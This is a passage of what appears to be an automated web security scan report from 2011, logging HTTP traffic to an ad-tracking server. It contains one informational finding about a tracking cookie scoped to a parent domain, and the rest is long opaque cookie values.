lMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_lZdW="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9RC0SyMoveM9OR5om4StALLEl9sEMKhnxvCJ6IV+6n10UiflLT2U8DIkh6vC9iiTCTmXNoS8BeeCz8RUiZEMx+JyoAXNHAdaEgiR9I+LvWsTdJXXMNkOqEJMCZ8jHgZ6aU7/Kdkn1ElCaNBDafAkShCFVu0+qChSF13EHU87/JBvZPrrF9ZsXbzAMXEKk4yvs+MRhQLiwDktsG45MpdMLU0YkhddBuxleRrm3nmX7xk5eoy5XTyYkvymmziP46mG0dettHI6kWm+gxvR2AthG7NC4YU13BgUDa+ATGw2jif22IiBTpUGNq8+kSpSElhpnkQOiU4yA7Fhj1EIQuYCh6B9q8UOQ6iBMmM0Wv7k0qstyg6IsUywLUsi7j35y2ct1flWi2lWav1Z+o6AQx74y+BXtYXbOOG+KPWkEpIT0C/yR5BCk3sJlb3EFeGe7v2ZoEcoHdsYKDeoiQouMeZ3OfQij2DWlJrrGbqO6VzKjx5V7sWUdPVsOiHtqQpirnhdn8cC/LAMwQ28JeP49jpQRyi39SHwZgOXQxSMpAUYcx3hXxG2dhK1oEVFnfBGcB28NmvSodnMHPXRJmhbidlVcw2zqi3ZXpeOmGtetLYMh16qo5ITj/hb+UgdW5NqRIX71nuRlmtdkG6SejOdr09szWnCBpQBu/xl0G7+T9thitx/oZv8gdWjAWyFRzJygPUjwws8exdHFHc9E/Ad8HIvpkCP8xPM83DNKQPfvnt19gZCORXQfWpO+7m40BidVs41XzwAVAsg2J/7WQ0/56sG/CteGyqjXdhpJlomWRbacFpfvvaNnWQLZ+F3nSUYs6QpevIWYM0EIBh4O/k1CW9hEg/P9a9MerxR6KcsHSTGuLablUPatMr5CKDdC7dilqtvCPRbqvGxY7/S1GFVe8ugvIR3TU29iuhQh4DM8dXU2eXESGkBEOnmBdyyLDVl2QYmQMiswfU397Np+yrqmH3+h0msDELv4ek/a2rsVVFE85nYIc5704A5RfvXGC0dc/QkwOlf0qWiFtFjugSXqIleEiQa4VOlI/SPmRklgIwjlK9f0i8uN4FXhanYREE7UC4bylUhJ9tVMqOC/gGOIdVcx9nq+ak/2Bia4oQ1CGGsRBvNDeeFcD7DXZGOGXfin0KINWZBEVNRzGpJWUCVC3BvFrgC8zy8jdL0OdypkNvMtNIlM+84TBY1pJgQVZwTt4Gccoz/3FGVM1bW6+scW3ayQD9Bg+pqhUu+X8Xq3/e2j3/jX0T4jhw1/N8qYLjvtAYpqtVeb5Rz8YYG47UfIuJICqU9YL/bWyVlh2bMPPrXOww/kEd9p4AmWrg=="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd1yGE6g8BwU8BLTkNk43VN7eq0QNSW3IckioMsnImtVu1KLfKMnApLMfGK0rX2a4suETL3AzYxm0B46Xf51wRLqXjsjHtiMYCuk8/Ai0Md6jGPTKhBYdQMtcWmZ9mmoM3pUBMNLMvCKFJz+fyoe95N9cDHHyciFups/NYIhgCIzxhfdpujXJD7jp+g2EzGPG++Fn0WbbGjOha2iYDawnvmekncJzWncmw49BryuYGiev5Vm1P3+m5bhYA62bE5AudfiMPXOGaGko9RunC/sgnulIKvCnA8pu65st5BrwyC9/9NBSf85RMsvT4IbxQ2ok0fplAi/9GmZyk1pvvB2muooyyNzUx2Be1eokgwS11SEHXUxZOKaM4n1GP4x/2tN9hRDVs3rZT4HcErVpaoHTlpdnNlTfI03lmtVIhceY2l0b17ce5sP98GG1uTHd/LYpdZdIbP59Fnt1KuHmz7Z80JCzRE9hJAyLfUiRH6eEiv8xB/AT+u9ividjAcx7tiQR9JMdUe2NLnrKR5qIkEE/WP6HYU+bOa6PzpSNqFFNUKKW2dqDEVMZinKhzdVIEZ5n81mrKFskOY7o/c3TqxLlSRLQNIx/sl69XQoSJuWmc5ZzAFsZHrJ0YTEdcopTaz7jFN0wIZHzJiMekt7NnOgsgC7g21KeZWQqYpWcMf7B1MHi203mm+OjogUYbrLYRNvOS2dnZsXENPgBQ4/CjphGzacW8mGb57HXKInWZGIAhUPKN+0BQHzjCECuPs/+eC7wI/VWqyNsbbk+EQ5TOX9cHP1dxBJQ54QPhPF4Ap6HTenF3jge7upqBAAXBQK8H1p3Z7cJDHRop+iIRpKaRshvN/HixA7M6TkZCMUYSqrsfblj2g+LwbSRohOMJNkOE89uxE/aNPKijTwZjwTa6a9ykVaD1MDLLGgvxgYUWLZJiEiFwd+WPs2EstzUkgUPV3loc5LtfRfmV55RnJPcVlQ50PQGrR8tYnMaCVTsghXyudZu/+mhWFnjP31Fo4aPw2+R/Y4vFE+8Cbkip4uWG8qw3ZH1QiYllfK2IhPX0sg4UgeCB2usVICpN1xJws9XAPOs3k5SXQLcfSoksigUlUhyfpcR8wQXSbnmqAjbevg4vcax2mux4x7oEzdUsxO+kNwmolgN13z4rfuIQx7KCq3MsV+wq2FBewuALM527ObxGDHkg5D27Osxid7UYpwH8dtQ2NEb7HrUTpas8kelzmYsGq1UU0RirT/Q0ufhv+gCPmwPekKys5AXYdQqjB4/vxIrPOWErG+muD+cGsL6TGeLMDjoJtUtndJ7GqBfDivlvv1maFJSWluqO0NrC4c+gtJwtaLUfUY3Bei+KjqoqN9PWilLKdCZz6qgBN1RRax3hu1jfMp0ZZn/4PYbm0+nstnYnjnLIxOn98tvLXknQ/nR19CtYlibliAnYkhrafEGLcO2BUqau8wYIyE0ciGGdKk6hTSl8cZlKBRbZDCyPJIxBBfovlaeR0THs+wofPI1XgQ3QXmaCsvgIeFluAnuluhJ9qeVniwXzXa5y1rDBSXl4M3SqlMFmDh9j8Msq12heUju3vy2RDhnZaHF5588fZnu9mFuUZ5Il4FFI9RIha+KiNKk4Fd2bQD82t9Xe7XqkFrUWTXiU8RWVLVab7qUYWckhI8LEoqh5dxwWpaAXKdztXuthBPw0k/4OlqVmtpAnb4kktw8xvo+bEAH2jH5c+QxhqO8ylhNTwDSzHmj4U9WY"; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkDDDA6eADT10E2TZRRbEIySo/UWd5psmrYatB2kBnU6SSkHFIHZYBJEHWaCW+4z4aSyyY0W5c0FoFlDXAUEgoeqnG3CUqVeF28RHMrctoqtaohUjTO8CHuSP15GfKkcTktQeUTl9WaxDGqmES50guT4EAR/+uvS+jSarDh6IQeTqtBQklVUjNu7YLMo+ZnVB+yyfsD5RLdiREGAyqK/XVdLTQcmLEsU3A5fBhn4ZDxlJ3bO1VQ86QqdXsMfwZoSgGUrmLjw6qU24JhEpRyHBp574yIAEU5A28AqStEuTcw1wT+KhWthxu3AYUsLR9ADzJ2R2KzFmM6aD85cc4nxiV6vef0ICmGx5g69Cy4p0dmDZyxscEyjpI/1iDZ6+LHzyj9OVK6kxpmLRtoIHskpODil7g39ROpsGFaUfZWzRJ25nv4MXO/uOjTH6wjvtcdF/BxiIuZUf42aYmX9cWO3zxIo60LZaoZI0fPDkiGU8HXulrRJtAG5InIPaiRevfCEalQGjoIVztNEgbsNgBbQNwDt1/00FPGESYSuljOKdF3MH095+w6kiZgwek1xMiaLo678io+VkwjFp+NXLnMiX9F07sFEz+9pMTLi48TgR70U0yHEBit/dpr5oFg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05ZbNqmtVtCSg/DW3ynPdQrdHYXITnLz/IiEU9rR8N/1SuCaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTf/VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkOfiLGwhwOlW2A2Iz0fG7TaF72idj+/rLuiklM7PR6nyU9dux2RNNY=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:17:04 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.206. http://pix04.revsci.net/I10985/b3/0/3/1008211/922092432.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/922092432.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47ssdu65JwdrFTCDRvsJSum2Nh/OoReJg2v9kDss6IjP7s8e9ziqupcY9YN6TjgPN/URf2EAYz+5gw6zw3vuST7p/TekuKQlkFzcEhmWSCCDZ+JZoqdYPR9buIQNe+1g/DwtERBSEZfzzKXV5RK/jWqBqeswgoo7pnibg6V7tJYgzNCqdbpw77QHRUtHFFnoVz91fCrKVSnd9KdSI3Z1WahAqH5m27RALV8jDVWQaOEfRhYIjecdIQm2Jh608+l09rXwXl7KXIogFmw8aSrm8tn3nWCLh+89ja0R4BdOrZ8eyZFE7ZBmJRKxDA0kkJ4VkxqjiDfiz/AuG536ioPjM2e/VPdv5MO6LldoQ7YCGnE4nkIm1S1uPirRLgHwicwZ7k0Xo9Bu27oUNMN4etcOEMfd5g9PVLIhPNAtI5fhGnhUlnq8MBu6R9P4hNxJSXnfe7x45/8rVbybSV5hEhy2rgMD1o6Ktudn8TBRShFizzdc/eT4sHL9fb/4r51E9H0gB25/A8UlI6X4flClOOAeXVY0HbRv1Vt9i9ovrbpE5qwoH6eAzoa5ID3vPC2Z56fU5gh/CZ9optArH+ZVXeEyXpPm8m/PM1sRrq+5E2UOo2EzHfA4AZ5A2k/FgE6FJQ3GtNNk=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:35:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/922092432.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_88Kp="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1T5naB64mAw0+Om2ozfWioJhdIilX5IRQvCH+NxuS+n50ciflLT+1J0P6gvfddg8IjB3Yl514E3J4urcf4As6hj1VY7tYYI8QRsLDCUaMDNGw98b138Udz5hCOGYSYwOjI0NuMDQrFqojxmjGdi6J3Ns54nH/Mg156yTJ/mkW9rIB7utoDot0pQO5LxDZFgDwbPZ/XSViJu/5BYxqpjRK1KBsRuK0FqMWAVqPOV+hmJrnZczYdQYdF+kHa/CVqqAnqgK5bD7Hpo4J0REG2ucUYs41pqFPZ8CxmqTVVRseILLbQywyl0YLQLKK7qxpvHl3f4jMavRZ1WkjY6y3/nv8TtcgKW/puiD611D+FGxKFlecKvpL2C3I9eYlegcOleWm62jsQpD3Z5skM3lpjTte+D2Vde1Qm/9aKOMYCHPUzqbauIzLvrjKP72p0VNmHYRRCUbLGLD+qwbMgZixdMDapgBLeOuKmQAVjzm+gcB2ArkYmv7eLD6S0ZqUEAP1v4Ae8gQqpqROsgLgO7dPPjdtiuLbK1POEjaN7A0DQgij5PPgcgZJNiyipv4lmL/2mYW8OXyP6QlqMJDTo7vrhmX2EMxya9PqhQwgchwe9WbjAxJLO9Dmp8FghI1jwOFKRgEriay/xA8hp1MT1H6LTjuY+lYDrG6K1lJFnFFy/zym2RJpTDZYIWKSYJbmjhnxaZEnXCNxsiDwWdltfhVCJpZ1lL7r8t4thW3Jwdr0ZMRybo60eYMkSE7VzUr08gGFIhMwn8gxWD7gNHZ3P54/yiiMb6v8DdhnAndi+r88LUNeJZViw0AnD6K47JlYOfBsqWJMjtRodADYpje/bNUE/AA1JuzleqdkXkKgNO3B2gGVGG9yrEQkBH8lB8gl/Jv+t4fE67Cyk9onbkZrT8h+TuXqa13s3QHSOJJIVeMm5CXBFy+omw1fpKcDwTWr7EdEUMkoWe+9tgWLx89Lc3hxh+lh+e2VQ1A66mx4T2tISmJuqqY22S2IgGsPGPKKpwkdKZkd6sZRD6AeKquhgBakHxjBMwXztx5EuslUjuSct3Ar/846lBved0ICYmNjBXYOQ3/311eL8aeEsLFXdr+Ygaq4Q4Tm0KXZLbzixAkH4otMAUfH6Jq02OMHnKKJXXCiIHWUseliUhTwfGV3QxAGd6wWC7nI2PP5M9PQOUQrT6k5PVLXlK8oMEww8fGYwUVRmsTldtkCnefMKBQLAutxUnNSLfJwNNDvL34gvg51YHAdavaHqtjgPRRh5Ke62SAzA+dBFoSKizDS7UasL0KO0bBQ4QuQkJBCleupV6/EIWEMWd97ghtuWYidnwvA="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd1yGE6g8BwU8BLTkNk43VN7eqEddixdhwSAHSVn+5jNppl/pEoNPvfI3vGK436wtwsoJn1n5XUlMEI8yxJJW0CUtpmJTRLdy/SAYhSwYDT1hDfGyvC2mAs/Cp/hgYIUj3MEcHiWA8lw478Kl36sxjKUYp9QU0u5fnCbqsklGPjEOh6F2RM0ckGbIqWoDaf8GHMIcS6OJBJE4nJc/5BHOB+u7uvZ/I85tTSGSDBJPwU1wfPITuVvoHdGWOa3tJ/5mQp9am8Y4JC5WvvJHLsD7ltN1C8pHL8pu0v4hwhjgzQ7luOTSmnMohp+pRDKRQxKUephRDSwVAOdldOz8TNwS0kqLPb2HiZoFb03JeX1V5btv7mP0OxEj5N9wcTCMOX5jhR1hdYgnwanlV38o9x3iKTdQ4lSif0x0FZn7taBIV0Drw+kSkT2X67DcyUQpdbJ5uJ2tSngdi8sdK92cDB8ZqT+nM+RS+duuY9mQ99z2DcdAD8pBuZ8Tth2r0rIgrb4K8Sd9LofXlhJf47EfyqW445rzKjYyh0CwinsnzQD5VggBsvwqCHTQsLtXECT8bydygdTbBRu7mi8qd7Su1yT8Rn98TkwW2hutbVEoMqPQx+/LTvHrQetp8ndqo6ztchixL2XgtWd7zlXCA8Mm0+4+1G/ZAkFRox24pcao9cZ554idqMQ2E1C3TyXi7WCGU01GBuXUrYzFiPtipA/Km3zAwB1s3Hwu8u218uLe9kbfohQ8gmvQdYeMI8IKcfAF1p1ulJQ1LWyi/A367NsXyMmyV19R6EJEhSl/+201gC9PmOP55jmmDW+K/vtspMx6UA/CiP1s2wEOGHUjLEZYXCZzOOlwF7WuMs+HlVnGJMCGlnVdNEcAZMc5QnWbdB0Gsmf5Ag+GPvMSQB1Cm3MwjQogVRMcOvuQmu57i1AV734gChEUH1RmDSz/DrTWPQwYCpHd8cQv+PvWyXoemt2exok6dEscdxHduDlhRO5HH6E9BXjRGSbU9LdtiME/MNVDpaCr30bZKQG71xgFanOBzu/345w96H7k2oeOMnjUOmb4XIuSg3eS0F2fCC8U3aR0gwSTo46xlPfgX3BF2sSUB9Xq3pWqaykx3HHGTSisGsRVxXHecd/lyTZyOs6/D0e0qr0NGnCvoPWA+IxC4M3gzwL73+cmFRAR6jGsOmcpTGJecX/KdQPiQucsQjaapUQx9h1lVy1capdeiqiLWYvZCuv2r/zvQ/zHJtamJ5B3wKxyjmsInTWF7RPsbW6j19uF0AWD2LZZQkj6C38NLCmUvGbMM8fe71Y4zAxCweQf8vbI1+abdvcJEKZxer4pfC+Duw8NMimOLPo4y+6Dl8BZ1y5PU1WcdXkrhhr5ozxO/0DWiztj7fQ4gvYutHHFIwzMWb6yfjZwKxBa/OWbgOtw9JW00yHdeNkM9a+1V3lc5PYk08xs+rxYYUTxY4BcbrBg6ro5I5kKpzjnl1iHrtRFRkvM6Bhbrpz4MJejvDbyOCoTJOiIcMmzkDNqA1Z0Qw9qn3l+Gq/0XTi6EZqlhyagMnEMt60uy+z+wktS+Zxnt4n9cEmWbPQCUKTftTt5GAqN2VBLarpFj1bEKRl+mO/+ks0UZR1LebJUkLKHZ889QJKFtsZ0l2clMnJve2psCRUpVsdH6qovl7znk03BUds1bu5Y/3ND43LiX25yi1RRMZQsv/FB53Facr4L3KD3TerWRH6b10NcaqbFc7uSUHGZxq9Lw"; 